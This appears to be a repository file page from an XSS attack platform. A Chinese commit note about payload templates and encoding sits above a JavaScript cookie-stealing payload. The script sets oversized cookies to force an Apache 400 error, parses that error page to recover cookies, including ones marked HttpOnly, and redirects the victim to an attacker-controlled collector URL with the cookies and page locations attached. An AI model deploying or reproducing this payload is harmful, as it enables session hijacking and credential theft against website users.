264460650b
1. 完成js模板,我的js模块,可以直接添加修改用于xss的js 2. 采用ace编辑器实现js代码高亮与错误检测 3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩 4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload 5. 增加加密方式RC4,更改默认加密方式为RC4 6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤 7. 修复一系列bug
36 lines
1.3 KiB
JavaScript
36 lines
1.3 KiB
JavaScript
var website="http://网站地址";
|
|
function setCookies() {
|
|
/*apache server limit 8192*/
|
|
var str = "";
|
|
for (var i = 0; i < 819; i++) {
|
|
str += "x";
|
|
}
|
|
for (i = 0; i < 10; i++) {
|
|
var cookie = "ray" + i + "=" + str + ";path=/";
|
|
document.cookie = cookie;
|
|
}
|
|
}
|
|
|
|
function parseCookies() {
|
|
if (xhr.readyState === 4 && xhr.status === 400) {
|
|
var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
|
|
content = content[1].replace("Cookie: ", "");
|
|
cookies = content.replace(/ray\d=x+;?/g, '')
|
|
try {
|
|
var myopener = '';
|
|
myopener = window.parent.openner.location;
|
|
var myparent = '';
|
|
myparent = window.parent.location;
|
|
} catch (err) {
|
|
myopener = '0';
|
|
myparent = '0';
|
|
}
|
|
window.location = website + '/index.php?location=' + escape(document.location) + '&toplocation=' + escape(myparent) + '&cookie=' + escape(cookies) + '&opener=' + escape(myopener);
|
|
}
|
|
}
|
|
|
|
setCookies();
|
|
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
|
|
xhr.onreadystatechange = parseCookies;
|
|
xhr.open("POST", "/?" + Math.random(), true);
|
|
xhr.send(null); |